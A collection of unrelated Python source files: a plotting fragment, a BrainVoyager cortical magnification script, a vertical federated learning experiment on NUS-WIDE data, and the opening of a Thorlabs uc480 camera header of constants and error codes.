plt.plot(scales, 2 ** lineFit, linewidth = 1, label = r'$\alpha$ = %0.2f' % (scaleParameter))
plt.xlabel(r'$\log_{10}$(scale)')
plt.ylabel(r'$\log_{10}$(F)')
plt.title('F vs Scale')
plt.legend(loc='best')
|
"""Read Brainvoyager srf & smp files to compute cortical magnification."""
import os
import numpy as np
from copy import copy
import bvbabel
FILE_SRF = "/home/faruk/Documents/test_bvbabel/SRF/surface.srf"
FILE_SMP = "/home/faruk/Documents/test_bvbabel/SRF/maps.smp"
# These values are required to compute vertex-wise distance in mm
VMR_IMAGE_DIMS = 512 # Stands for e.g. 512 x 512 x 512, or 256 x 256 x 256
VMR_VOXEL_DIMS = 0.4 # Stands for e.g 0.4 x 0.4 x 0.4 mm^3 ot 1 x 1 x 1 mm^3
# =============================================================================
# Load files
header_srf, data_srf = bvbabel.srf.read_srf(FILE_SRF)
header_smp, data_smp = bvbabel.smp.read_smp(FILE_SMP)
# Get vertex coordinates (2D numpy array)
vtx = data_srf["vertices"]
# Get vertex neighbors (python list)
nbr = data_srf["vertex neighbors"]
# Get PRF mapping visual field c & y coordinates
print(header_smp["Map"][1]["Name"])
print(header_smp["Map"][2]["Name"])
prf_xy = data_smp[:, 1:3]
# -----------------------------------------------------------------------------
print("Computing cortical magnification factors...")
# Prepare useful variables
nr_vtx = header_srf["Nr vertices"]
map_cmf = np.zeros(nr_vtx)
# Compute cortical magnification for each vertex
for v in range(nr_vtx):
if prf_xy[v, 0] != 0 and prf_xy[v, 1] != 0:
cmf_sum = 0
n_count = 0
for n in nbr[v][1:]: # Loop over neighbor vertices
# Compute vertex to vertex mesh distance
dist_cortex = np.linalg.norm(vtx[v, :] - vtx[n, :])
# Convert vertex to vertex mesh distance to millimeters
dist_cortex *= (VMR_IMAGE_DIMS / 256) * VMR_VOXEL_DIMS
# Compute vertex to vertex PRF xy coordinates distance
dist_vfield = np.linalg.norm(prf_xy[v, :] - prf_xy[n, :])
# Compute cortical magnification factor (CMF)
# NOTE: CMF = "mm of cortical surface" / "degree of visual angle"
if dist_vfield > 0:
cmf_sum += dist_cortex / dist_vfield
n_count += 1
# Normalize cumulative CMF with the number of non-zero neighbours
if cmf_sum > 0:
cmf = cmf_sum / n_count
# Put the vertex-wise average CMF into smp map format
map_cmf[v] = cmf
else:
map_cmf[v] = 0
# -----------------------------------------------------------------------------
# Prepare new SMP map
header_smp["Nr maps"] += 1
header_smp["Map"].append(copy(header_smp["Map"][4]))
header_smp["Map"][-1]["Name"] = "CMF, UseThreshMap: R"
header_smp["Map"][-1]["Threshold min"] = 0.001
header_smp["Map"][-1]["Threshold max"] = 5.
header_smp["Map"][-1]["LUT file"] = "default_v21_inv.olt"
data_smp = np.hstack([data_smp, map_cmf[:, None]])
# Add reciprocal of CMF as it linearly increases with eccentricity
header_smp["Nr maps"] += 1
header_smp["Map"].append(copy(header_smp["Map"][4]))
header_smp["Map"][-1]["Name"] = "CMF reciprocal, UseThreshMap: R"
header_smp["Map"][-1]["Threshold min"] = 0.001
header_smp["Map"][-1]["Threshold max"] = 1.5
header_smp["Map"][-1]["LUT file"] = "default_v21_inv.olt"
map_cmf[map_cmf > 0] = 1 / map_cmf[map_cmf > 0] # Reciprocal of non-zeros
data_smp = np.hstack([data_smp, map_cmf[:, None]])
# Save SMP
basename = FILE_SMP.split(os.extsep, 1)[0]
outname = "{}_bvbabel-CMF.smp".format(basename)
bvbabel.smp.write_smp(outname, header_smp, data_smp)
print("Finished.")
|
<reponame>Alex-Roudjiat/Federated-ML-AI-Federated-ML-
import os
import sys
from sklearn.utils import shuffle
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../")))
from fedml_api.data_preprocessing.NUS_WIDE.nus_wide_dataset import NUS_WIDE_load_two_party_data
from fedml_api.standalone.classical_vertical_fl.vfl_fixture import FederatedLearningFixture
from fedml_api.standalone.classical_vertical_fl.party_models import VFLGuestModel, VFLHostModel
from fedml_api.model.finance.vfl_models_standalone import LocalModel, DenseModel
from fedml_api.standalone.classical_vertical_fl.vfl import VerticalMultiplePartyLogisticRegressionFederatedLearning
def run_experiment(train_data, test_data, batch_size, learning_rate, epoch):
print("hyper-parameters:")
print("batch size: {0}".format(batch_size))
print("learning rate: {0}".format(learning_rate))
Xa_train, Xb_train, y_train = train_data
Xa_test, Xb_test, y_test = test_data
print("################################ Wire Federated Models ############################")
# create local models for both party A and party B
party_a_local_model = LocalModel(input_dim=Xa_train.shape[1], output_dim=60, learning_rate=learning_rate)
party_b_local_model = LocalModel(input_dim=Xb_train.shape[1], output_dim=60, learning_rate=learning_rate)
# create lr model for both party A and party B. Each party has a part of the whole lr model and only party A has
# the bias since only party A has the labels.
party_a_dense_model = DenseModel(party_a_local_model.get_output_dim(), 1, learning_rate=learning_rate, bias=True)
party_b_dense_model = DenseModel(party_b_local_model.get_output_dim(), 1, learning_rate=learning_rate, bias=False)
partyA = VFLGuestModel(local_model=party_a_local_model)
partyA.set_dense_model(party_a_dense_model)
partyB = VFLHostModel(local_model=party_b_local_model)
partyB.set_dense_model(party_b_dense_model)
party_B_id = "B"
federatedLearning = VerticalMultiplePartyLogisticRegressionFederatedLearning(partyA)
federatedLearning.add_party(id=party_B_id, party_model=partyB)
federatedLearning.set_debug(is_debug=False)
print("################################ Train Federated Models ############################")
fl_fixture = FederatedLearningFixture(federatedLearning)
# only party A has labels (i.e., Y), other parties only have features (e.g., X).
# 'party_list' stores X for all other parties.
# Since this is two-party VFL, 'party_list' only stores the X of party B.
train_data = {federatedLearning.get_main_party_id(): {"X": Xa_train, "Y": y_train},
"party_list": {party_B_id: Xb_train}}
test_data = {federatedLearning.get_main_party_id(): {"X": Xa_test, "Y": y_test},
"party_list": {party_B_id: Xb_test}}
fl_fixture.fit(train_data=train_data, test_data=test_data, epochs=epoch, batch_size=batch_size)
if __name__ == '__main__':
print("################################ Prepare Data ############################")
data_dir = "../../../data/NUS_WIDE"
class_lbls = ['person', 'animal']
train, test = NUS_WIDE_load_two_party_data(data_dir, class_lbls, neg_label=0)
Xa_train, Xb_train, y_train = train
Xa_test, Xb_test, y_test = test
batch_size = 128
epoch = 100
lr = 0.01
Xa_train, Xb_train, y_train = shuffle(Xa_train, Xb_train, y_train)
Xa_test, Xb_test, y_test = shuffle(Xa_test, Xb_test, y_test)
train = [Xa_train, Xb_train, y_train]
test = [Xa_test, Xb_test, y_test]
run_experiment(train_data=train, test_data=test, batch_size=batch_size, learning_rate=lr, epoch=epoch)
|
<reponame>LisaWillig/UDKM_Beamprofiler
"""
.. module: uc480.uc480_h
:platform: Windows, Linux
.. moduleauthor:: <NAME> <<EMAIL>>
Thorlabs' uc480 header file translated to python.
..
This file is part of the uc480 python module.
The uc480 python module is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The uc480 python module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the uc480 python module. If not, see <http://www.gnu.org/licenses/>.
Copyright 2015 <NAME> <<EMAIL>>.
"""
import platform
import ctypes
if platform.system() == "Windows":
import ctypes.wintypes as wt
else:
import wintypes_linux as wt
# ----------------------------------------------------------------------------
# Color modes
# ----------------------------------------------------------------------------
IS_COLORMODE_INVALID = 0
IS_COLORMODE_MONOCHROME = 1
IS_COLORMODE_BAYER = 2
IS_COLORMODE_CBYCRY = 4
# ----------------------------------------------------------------------------
# Sensor Types
# ----------------------------------------------------------------------------
IS_SENSOR_INVALID = 0x0000
# CMOS sensors
IS_SENSOR_C0640R13M = 0x0001 # cmos, 0640x0480, rolling, 1/3", mono,
IS_SENSOR_C0640R13C = 0x0002 # cmos, 0640x0480, rolling, 1/3", color,
IS_SENSOR_C1280R23M = 0x0003 # cmos, 1280x1024, rolling, 1/1.8", mono,
IS_SENSOR_C1280R23C = 0x0004 # cmos, 1280x1024, rolling, 1/1.8", color,
IS_SENSOR_C1600R12C = 0x0008 # cmos, 1600x1200, rolling, 1/2", color,
IS_SENSOR_C2048R12C = 0x000A # cmos, 2048x1536, rolling, 1/2", color,
IS_SENSOR_C2592R12M = 0x000B # cmos, 2592x1944, rolling, 1/2", mono
IS_SENSOR_C2592R12C = 0x000C # cmos, 2592x1944, rolling, 1/2", color
IS_SENSOR_C0640G12M = 0x0010 # cmos, 0640x0480, global, 1/2", mono,
IS_SENSOR_C0640G12C = 0x0011 # cmos, 0640x0480, global, 1/2", color,
IS_SENSOR_C0752G13M = 0x0012 # cmos, 0752x0480, global, 1/3", mono,
IS_SENSOR_C0752G13C = 0x0013 # cmos, 0752x0480, global, 1/3", color,
IS_SENSOR_C1282R13C = 0x0015 # cmos, 1280x1024, rolling, 1/3", color,
IS_SENSOR_C1601R13C = 0x0017 # cmos, 1600x1200, rolling, 1/3.2", color,
IS_SENSOR_C0753G13M = 0x0018 # cmos, 0752x0480, global, 1/3", mono,
IS_SENSOR_C0753G13C = 0x0019 # cmos, 0752x0480, global, 1/3", color,
IS_SENSOR_C0754G13M = 0x0022 # cmos, 0752x0480, global, 1/3", mono, single board (LE)
IS_SENSOR_C0754G13C = 0x0023 # cmos, 0752x0480, global, 1/3", color, single board (LE)
IS_SENSOR_C1284R13C = 0x0025 # cmos, 1280x1024, rolling, 1/3", color, single board (LE))
IS_SENSOR_C1604R13C = 0x0027 # cmos, 1600x1200, rolling, 1/3.2", color, single board (LE)
IS_SENSOR_C1285R12M = 0x0028 # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1285R12C = 0x0029 # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1605R12C = 0x002B # cmos, 1600x1200, rolling, 1/2", color, single board
IS_SENSOR_C2055R12C = 0x002D # cmos, 2048x1536, rolling, 1/2", color, single board
IS_SENSOR_C2595R12M = 0x002E # cmos, 2592x1944, rolling, 1/2", mono, single board
IS_SENSOR_C2595R12C = 0x002F # cmos, 2592x1944, rolling, 1/2", color, single board
IS_SENSOR_C1280R12M = 0x0030 # cmos, 1280x1024, rolling, 1/2", mono,
IS_SENSOR_C1280R12C = 0x0031 # cmos, 1280x1024, rolling, 1/2", color,
IS_SENSOR_C1283R12M = 0x0032 # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1283R12C = 0x0033 # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1603R12M = 0x0034 # cmos, 1600x1200, rolling, 1/2", mono, single board
IS_SENSOR_C1603R12C = 0x0035 # cmos, 1600x1200, rolling, 1/2", color, single board
IS_SENSOR_C2053R12C = 0x0037 # cmos, 2048x1536, rolling, 1/2", color, single board
IS_SENSOR_C2593R12M = 0x0038 # cmos, 2592x1944, rolling, 1/2", mono, single board
IS_SENSOR_C2593R12C = 0x0039 # cmos, 2592x1944, rolling, 1/2", color, single board
IS_SENSOR_C1286R12M = 0x003A # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1286R12C = 0x003B # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1287R12M_WO = 0x003C # cmos, 1280x1024, rolling, 1/2", color, USB board
IS_SENSOR_C1287R12C_WO = 0x003D # cmos, 1280x1024, rolling, 1/2", color, USB board
IS_SENSOR_C3840R12M = 0x003E # cmos, 3840x2760, rolling, 1/2.5", mono
IS_SENSOR_C3840R12C = 0x003F # cmos, 3840x2760, rolling, 1/2.5", color
IS_SENSOR_C3845R12M = 0x0040 # cmos, 3840x2760, rolling, 1/2.5", mono, single board
IS_SENSOR_C3845R12C = 0x0041 # cmos, 3840x2760, rolling, 1/2.5", color, single board
IS_SENSOR_C0768R12M = 0x004A # cmos, 0768x0576, rolling, HDR sensor, 1/2", mono
IS_SENSOR_C0768R12C = 0x004B # cmos, 0768x0576, rolling, HDR sensor, 1/2", color
IS_SENSOR_C2057R12M_WO = 0x0044 # cmos, 2048x1536, rolling, 1/2", mono, USB board (special version WO)
IS_SENSOR_C2057R12C_WO = 0x0045 # cmos, 2048x1536, rolling, 1/2", color, USB board (special version WO)
IS_SENSOR_C2597R12M = 0x0048 # cmos, 2592x1944, rolling, 1/2", mono, USB board (special version WO)
IS_SENSOR_C2597R12C = 0x0049 # cmos, 2592x1944, rolling, 1/2", color, WO board (special version WO)
IS_SENSOR_C1280G12M = 0x0050 # cmos, 1280x1024, global, 1/2", mono
IS_SENSOR_C1280G12C = 0x0051 # cmos, 1280x1024, global, 1/2", color
# CCD sensors
IS_SENSOR_D1024G13M = 0x0080 # ccd, 1024x0768, global, 1/3", mono,
IS_SENSOR_D1024G13C = 0x0081 # ccd, 1024x0768, global, 1/3", color,
IS_SENSOR_D0640G13M = 0x0082 # ccd, 0640x0480, global, 1/3", mono
IS_SENSOR_D0640G13C = 0x0083 # ccd, 0640x0480, global, 1/3", color
IS_SENSOR_D1281G12M = 0x0084 # ccd, 1280x1024, global, 1/2", mono
IS_SENSOR_D1281G12C = 0x0085 # ccd, 1280x1024, global, 1/2", color
IS_SENSOR_D0640G12M = 0x0088 # ccd, 0640x0480, global, 1/2", mono,
IS_SENSOR_D0640G12C = 0x0089 # ccd, 0640x0480, global, 1/2", color,
IS_SENSOR_D0640G14M = 0x0090 # ccd, 0640x0480, global, 1/4", mono,
IS_SENSOR_D0640G14C = 0x0091 # ccd, 0640x0480, global, 1/4", color,
IS_SENSOR_D0768G12M = 0x0092 # ccd, 0768x0582, global, 1/2", mono,
IS_SENSOR_D0768G12C = 0x0093 # ccd, 0768x0582, global, 1/2", color,
IS_SENSOR_D1280G12M = 0x0096 # ccd, 1280x1024, global, 1/2", mono,
IS_SENSOR_D1280G12C = 0x0097 # ccd, 1280x1024, global, 1/2", color,
IS_SENSOR_D1600G12M = 0x0098 # ccd, 1600x1200, global, 1/1.8", mono,
IS_SENSOR_D1600G12C = 0x0099 # ccd, 1600x1200, global, 1/1.8", color,
IS_SENSOR_D1280G13M = 0x009A # ccd, 1280x960, global, 1/3", mono,
IS_SENSOR_D1280G13C = 0x009B # ccd, 1280x960, global, 1/3", color,
# ----------------------------------------------------------------------------
# error codes
# ----------------------------------------------------------------------------
IS_NO_SUCCESS = -1 # function call failed
IS_SUCCESS = 0 # function call succeeded
IS_INVALID_CAMERA_HANDLE = 1 # camera handle is not valid or zero
IS_INVALID_HANDLE = 1 # a handle other than the camera handle is invalid
IS_IO_REQUEST_FAILED = 2 # an io request to the driver failed
IS_CANT_OPEN_DEVICE = 3 # returned by is_InitCamera
IS_CANT_CLOSE_DEVICE = 4
IS_CANT_SETUP_MEMORY = 5
IS_NO_HWND_FOR_ERROR_REPORT = 6
IS_ERROR_MESSAGE_NOT_CREATED = 7
IS_ERROR_STRING_NOT_FOUND = 8
IS_HOOK_NOT_CREATED = 9
IS_TIMER_NOT_CREATED = 10
IS_CANT_OPEN_REGISTRY = 11
IS_CANT_READ_REGISTRY = 12
IS_CANT_VALIDATE_BOARD = 13
IS_CANT_GIVE_BOARD_ACCESS = 14
IS_NO_IMAGE_MEM_ALLOCATED = 15
IS_CANT_CLEANUP_MEMORY = 16
IS_CANT_COMMUNICATE_WITH_DRIVER = 17
IS_FUNCTION_NOT_SUPPORTED_YET = 18
IS_OPERATING_SYSTEM_NOT_SUPPORTED = 19
IS_INVALID_VIDEO_IN = 20
IS_INVALID_IMG_SIZE = 21
IS_INVALID_ADDRESS = 22
IS_INVALID_VIDEO_MODE = 23
IS_INVALID_AGC_MODE = 24
IS_INVALID_GAMMA_MODE = 25
IS_INVALID_SYNC_LEVEL = 26
IS_INVALID_CBARS_MODE = 27
IS_INVALID_COLOR_MODE = 28
IS_INVALID_SCALE_FACTOR = 29
IS_INVALID_IMAGE_SIZE = 30
IS_INVALID_IMAGE_POS = 31
IS_INVALID_CAPTURE_MODE = 32
IS_INVALID_RISC_PROGRAM = 33
IS_INVALID_BRIGHTNESS = 34
IS_INVALID_CONTRAST = 35
IS_INVALID_SATURATION_U = 36
IS_INVALID_SATURATION_V = 37
IS_INVALID_HUE = 38
IS_INVALID_HOR_FILTER_STEP = 39
IS_INVALID_VERT_FILTER_STEP = 40
IS_INVALID_EEPROM_READ_ADDRESS = 41
IS_INVALID_EEPROM_WRITE_ADDRESS = 42
IS_INVALID_EEPROM_READ_LENGTH = 43
IS_INVALID_EEPROM_WRITE_LENGTH = 44
IS_INVALID_BOARD_INFO_POINTER = 45
IS_INVALID_DISPLAY_MODE = 46
IS_INVALID_ERR_REP_MODE = 47
IS_INVALID_BITS_PIXEL = 48
IS_INVALID_MEMORY_POINTER = 49
IS_FILE_WRITE_OPEN_ERROR = 50
IS_FILE_READ_OPEN_ERROR = 51
IS_FILE_READ_INVALID_BMP_ID = 52
IS_FILE_READ_INVALID_BMP_SIZE = 53
IS_FILE_READ_INVALID_BIT_COUNT = 54
IS_WRONG_KERNEL_VERSION = 55
IS_RISC_INVALID_XLENGTH = 60
IS_RISC_INVALID_YLENGTH = 61
IS_RISC_EXCEED_IMG_SIZE = 62
# DirectDraw Mode errors
IS_DD_MAIN_FAILED = 70
IS_DD_PRIMSURFACE_FAILED = 71
IS_DD_SCRN_SIZE_NOT_SUPPORTED = 72
IS_DD_CLIPPER_FAILED = 73
IS_DD_CLIPPER_HWND_FAILED = 74
IS_DD_CLIPPER_CONNECT_FAILED = 75
IS_DD_BACKSURFACE_FAILED = 76
IS_DD_BACKSURFACE_IN_SYSMEM = 77
IS_DD_MDL_MALLOC_ERR = 78
IS_DD_MDL_SIZE_ERR = 79
IS_DD_CLIP_NO_CHANGE = 80
IS_DD_PRIMMEM_NULL = 81
IS_DD_BACKMEM_NULL = 82
IS_DD_BACKOVLMEM_NULL = 83
IS_DD_OVERLAYSURFACE_FAILED = 84
IS_DD_OVERLAYSURFACE_IN_SYSMEM = 85
IS_DD_OVERLAY_NOT_ALLOWED = 86
IS_DD_OVERLAY_COLKEY_ERR = 87
IS_DD_OVERLAY_NOT_ENABLED = 88
IS_DD_GET_DC_ERROR = 89
IS_DD_DDRAW_DLL_NOT_LOADED = 90
IS_DD_THREAD_NOT_CREATED = 91
IS_DD_CANT_GET_CAPS = 92
IS_DD_NO_OVERLAYSURFACE = 93
IS_DD_NO_OVERLAYSTRETCH = 94
IS_DD_CANT_CREATE_OVERLAYSURFACE = 95
IS_DD_CANT_UPDATE_OVERLAYSURFACE = 96
IS_DD_INVALID_STRETCH = 97
IS_EV_INVALID_EVENT_NUMBER = 100
IS_INVALID_MODE = 101
IS_CANT_FIND_FALCHOOK = 102
IS_CANT_FIND_HOOK = 102
IS_CANT_GET_HOOK_PROC_ADDR = 103
IS_CANT_CHAIN_HOOK_PROC = 104
IS_CANT_SETUP_WND_PROC = 105
IS_HWND_NULL = 106
IS_INVALID_UPDATE_MODE = 107
IS_NO_ACTIVE_IMG_MEM = 108
IS_CANT_INIT_EVENT = 109
IS_FUNC_NOT_AVAIL_IN_OS = 110
IS_CAMERA_NOT_CONNECTED = 111
IS_SEQUENCE_LIST_EMPTY = 112
IS_CANT_ADD_TO_SEQUENCE = 113
IS_LOW_OF_SEQUENCE_RISC_MEM = 114
IS_IMGMEM2FREE_USED_IN_SEQ = 115
IS_IMGMEM_NOT_IN_SEQUENCE_LIST= 116
IS_SEQUENCE_BUF_ALREADY_LOCKED= 117
IS_INVALID_DEVICE_ID = 118
IS_INVALID_BOARD_ID = 119
IS_ALL_DEVICES_BUSY = 120
IS_HOOK_BUSY = 121
IS_TIMED_OUT = 122
IS_NULL_POINTER = 123
IS_WRONG_HOOK_VERSION = 124
IS_INVALID_PARAMETER = 125 # a parameter specified was invalid
IS_NOT_ALLOWED = 126
IS_OUT_OF_MEMORY = 127
IS_INVALID_WHILE_LIVE = 128
IS_ACCESS_VIOLATION = 129 # an internal exception occurred
IS_UNKNOWN_ROP_EFFECT = 130
IS_INVALID_RENDER_MODE = 131
IS_INVALID_THREAD_CONTEXT = 132
IS_NO_HARDWARE_INSTALLED = 133
IS_INVALID_WATCHDOG_TIME = 134
IS_INVALID_WATCHDOG_MODE = 135
IS_INVALID_PASSTHROUGH_IN = 136
IS_ERROR_SETTING_PASSTHROUGH_IN = 137
IS_FAILURE_ON_SETTING_WATCHDOG = 138
IS_NO_USB20 = 139 # the usb port doesnt support usb 2.0
IS_CAPTURE_RUNNING = 140 # there is already a capture running
IS_MEMORY_BOARD_ACTIVATED = 141 # operation could not execute while mboard is enabled
IS_MEMORY_BOARD_DEACTIVATED = 142 # operation could not execute while mboard is disabled
IS_NO_MEMORY_BOARD_CONNECTED = 143 # no memory board connected
IS_TOO_LESS_MEMORY = 144 # image size is above memory capacity
IS_IMAGE_NOT_PRESENT = 145 # requested image is no longer present in the camera
IS_MEMORY_MODE_RUNNING = 146
IS_MEMORYBOARD_DISABLED = 147
IS_TRIGGER_ACTIVATED = 148 # operation could not execute while trigger is enabled
IS_WRONG_KEY = 150
IS_CRC_ERROR = 151
IS_NOT_YET_RELEASED = 152 # this feature is not available yet
IS_NOT_CALIBRATED = 153 # the camera is not calibrated
IS_WAITING_FOR_KERNEL = 154 # a request to the kernel exceeded
IS_NOT_SUPPORTED = 155 # operation mode is not supported
IS_TRIGGER_NOT_ACTIVATED = 156 # operation could not execute while trigger is disabled
IS_OPERATION_ABORTED = 157
IS_BAD_STRUCTURE_SIZE = 158
IS_INVALID_BUFFER_SIZE = 159
IS_INVALID_PIXEL_CLOCK = 160
IS_INVALID_EXPOSURE_TIME = 161
IS_AUTO_EXPOSURE_RUNNING = 162
IS_CANNOT_CREATE_BB_SURF = 163 # error creating backbuffer surface
IS_CANNOT_CREATE_BB_MIX = 164 # backbuffer mixer surfaces can not be created
IS_BB_OVLMEM_NULL = 165 # backbuffer overlay mem could not be locked
IS_CANNOT_CREATE_BB_OVL = 166 # backbuffer overlay mem could not be created
IS_NOT_SUPP_IN_OVL_SURF_MODE = 167 # function not supported in overlay surface mode
IS_INVALID_SURFACE = 168 # surface invalid
IS_SURFACE_LOST = 169 # surface has been lost
IS_RELEASE_BB_OVL_DC = 170 # error releasing backbuffer overlay DC
IS_BB_TIMER_NOT_CREATED = 171 # backbuffer timer could not be created
IS_BB_OVL_NOT_EN = 172 # backbuffer overlay has not been enabled
IS_ONLY_IN_BB_MODE = 173 # only possible in backbuffer mode
IS_INVALID_COLOR_FORMAT = 174 # invalid color format
IS_INVALID_WB_BINNING_MODE = 175 # invalid binning mode for AWB
IS_INVALID_I2C_DEVICE_ADDRESS = 176 # invalid I2C device address
IS_COULD_NOT_CONVERT = 177 # current image couldn't be converted
IS_TRANSFER_ERROR = 178 # transfer failed
IS_PARAMETER_SET_NOT_PRESENT = 179 # the parameter set is not present
IS_INVALID_CAMERA_TYPE = 180 # the camera type in the ini file doesn't match
IS_INVALID_HOST_IP_HIBYTE = 181 # HIBYTE of host address is invalid
IS_CM_NOT_SUPP_IN_CURR_DISPLAYMODE = 182 # color mode is not supported in the current display mode
IS_NO_IR_FILTER = 183
IS_STARTER_FW_UPLOAD_NEEDED = 184 # device starter firmware is not compatible
IS_DR_LIBRARY_NOT_FOUND = 185 # the DirectRender library could not be found
IS_DR_DEVICE_OUT_OF_MEMORY = 186 # insufficient graphics adapter video memory
IS_DR_CANNOT_CREATE_SURFACE = 187 # the image or overlay surface could not be created
IS_DR_CANNOT_CREATE_VERTEX_BUFFER = 188 # the vertex buffer could not be created
IS_DR_CANNOT_CREATE_TEXTURE = 189 # the texture could not be created
IS_DR_CANNOT_LOCK_OVERLAY_SURFACE = 190 # the overlay surface could not be locked
IS_DR_CANNOT_UNLOCK_OVERLAY_SURFACE = 191 # the overlay surface could not be unlocked
IS_DR_CANNOT_GET_OVERLAY_DC = 192 # cannot get the overlay surface DC
IS_DR_CANNOT_RELEASE_OVERLAY_DC = 193 # cannot release the overlay surface DC
IS_DR_DEVICE_CAPS_INSUFFICIENT = 194 # insufficient graphics adapter capabilities
IS_INCOMPATIBLE_SETTING = 195 # Operation is not possible because of another incompatible setting
IS_DR_NOT_ALLOWED_WHILE_DC_IS_ACTIVE = 196 # user App still has DC handle.
IS_DEVICE_ALREADY_PAIRED = 197 # The device is already paired
IS_SUBNETMASK_MISMATCH = 198 # The subnetmasks of the device and the adapter differ
IS_SUBNET_MISMATCH = 199 # The subnets of the device and the adapter differ
IS_INVALID_IP_CONFIGURATION = 200 # The IP configuation of the device is invalid
IS_DEVICE_NOT_COMPATIBLE = 201 # The device is incompatible to the driver
IS_NETWORK_FRAME_SIZE_INCOMPATIBLE = 202 # The frame size settings of the device and the network adapter are incompatible
IS_NETWORK_CONFIGURATION_INVALID = 203 # The network adapter configuration is invalid
IS_ERROR_CPU_IDLE_STATES_CONFIGURATION = 204 # The setting of the CPU idle state configuration failed
IS_DEVICE_BUSY = 205 # The device is busy. The operation must be executed again later.
# ----------------------------------------------------------------------------
# common definitions
# ----------------------------------------------------------------------------
IS_OFF = 0
IS_ON = 1
IS_IGNORE_PARAMETER = -1
# ----------------------------------------------------------------------------
# device enumeration
# ----------------------------------------------------------------------------
IS_USE_DEVICE_ID = 0x8000
IS_ALLOW_STARTER_FW_UPLOAD = 0x10000
# ----------------------------------------------------------------------------
# AutoExit enable/disable
# ----------------------------------------------------------------------------
IS_GET_AUTO_EXIT_ENABLED = 0x8000
IS_DISABLE_AUTO_EXIT = 0
IS_ENABLE_AUTO_EXIT = 1
# ----------------------------------------------------------------------------
# live/freeze parameters
# ----------------------------------------------------------------------------
IS_GET_LIVE = 0x8000
IS_WAIT = 0x0001
IS_DONT_WAIT = 0x0000
IS_FORCE_VIDEO_STOP = 0x4000
IS_FORCE_VIDEO_START = 0x4000
IS_USE_NEXT_MEM = 0x8000
# ----------------------------------------------------------------------------
# video finish constants
# ----------------------------------------------------------------------------
IS_VIDEO_NOT_FINISH = 0
IS_VIDEO_FINISH = 1
# ----------------------------------------------------------------------------
# bitmap render modes
# ----------------------------------------------------------------------------
IS_GET_RENDER_MODE = 0x8000
IS_RENDER_DISABLED = 0x0000
IS_RENDER_NORMAL = 0x0001
IS_RENDER_FIT_TO_WINDOW = 0x0002
IS_RENDER_DOWNSCALE_1_2 = 0x0004
IS_RENDER_MIRROR_UPDOWN = 0x0010
IS_RENDER_DOUBLE_HEIGHT = 0x0020
IS_RENDER_HALF_HEIGHT = 0x0040
IS_RENDER_PLANAR_COLOR_RED = 0x0080
IS_RENDER_PLANAR_COLOR_GREEN = 0x0100
IS_RENDER_PLANAR_COLOR_BLUE = 0x0200
IS_RENDER_PLANAR_MONO_RED = 0x0400
IS_RENDER_PLANAR_MONO_GREEN = 0x0800
IS_RENDER_PLANAR_MONO_BLUE = 0x1000
IS_USE_AS_DC_STRUCTURE = 0x4000
IS_USE_AS_DC_HANDLE = 0x8000
# ----------------------------------------------------------------------------
# external trigger modes
# ----------------------------------------------------------------------------
IS_GET_EXTERNALTRIGGER = 0x8000
IS_GET_TRIGGER_STATUS = 0x8001
IS_GET_TRIGGER_MASK = 0x8002
IS_GET_TRIGGER_INPUTS = 0x8003
IS_GET_SUPPORTED_TRIGGER_MODE = 0x8004
IS_GET_TRIGGER_COUNTER = 0x8000
# old defines for compatibility
IS_SET_TRIG_OFF = 0x0000
IS_SET_TRIG_HI_LO = 0x0001
IS_SET_TRIG_LO_HI = 0x0002
IS_SET_TRIG_SOFTWARE = 0x0008
IS_SET_TRIG_HI_LO_SYNC = 0x0010
IS_SET_TRIG_LO_HI_SYNC = 0x0020
IS_SET_TRIG_MASK = 0x0100
# New defines
IS_SET_TRIGGER_CONTINUOUS = 0x1000
IS_SET_TRIGGER_OFF = IS_SET_TRIG_OFF
IS_SET_TRIGGER_HI_LO = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_HI_LO)
IS_SET_TRIGGER_LO_HI = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_LO_HI)
IS_SET_TRIGGER_SOFTWARE = (IS_SET_TRIGGER_CONTINUOUS | IS_SET_TRIG_SOFTWARE)
IS_SET_TRIGGER_HI_LO_SYNC = IS_SET_TRIG_HI_LO_SYNC
IS_SET_TRIGGER_LO_HI_SYNC = IS_SET_TRIG_LO_HI_SYNC
IS_SET_TRIGGER_PRE_HI_LO = (IS_SET_TRIGGER_CONTINUOUS | 0x0040)
IS_SET_TRIGGER_PRE_LO_HI = (IS_SET_TRIGGER_CONTINUOUS | 0x0080)
IS_GET_TRIGGER_DELAY = 0x8000
IS_GET_MIN_TRIGGER_DELAY = 0x8001
IS_GET_MAX_TRIGGER_DELAY = 0x8002
IS_GET_TRIGGER_DELAY_GRANULARITY = 0x8003
# ----------------------------------------------------------------------------
# Timing
# ----------------------------------------------------------------------------
# pixelclock
IS_GET_PIXEL_CLOCK = 0x8000
IS_GET_DEFAULT_PIXEL_CLK = 0x8001
IS_GET_PIXEL_CLOCK_INC = 0x8005
# frame rate
IS_GET_FRAMERATE = 0x8000
IS_GET_DEFAULT_FRAMERATE = 0x8001
# exposure
IS_GET_EXPOSURE_TIME = 0x8000
IS_GET_DEFAULT_EXPOSURE = 0x8001
IS_GET_EXPOSURE_MIN_VALUE = 0x8002
IS_GET_EXPOSURE_MAX_VALUE = 0x8003
IS_GET_EXPOSURE_INCREMENT = 0x8004
IS_GET_EXPOSURE_FINE_INCREMENT = 0x8005
# ----------------------------------------------------------------------------
# Gain definitions
# ----------------------------------------------------------------------------
IS_GET_MASTER_GAIN = 0x8000
IS_GET_RED_GAIN = 0x8001
IS_GET_GREEN_GAIN = 0x8002
IS_GET_BLUE_GAIN = 0x8003
IS_GET_DEFAULT_MASTER = 0x8004
IS_GET_DEFAULT_RED = 0x8005
IS_GET_DEFAULT_GREEN = 0x8006
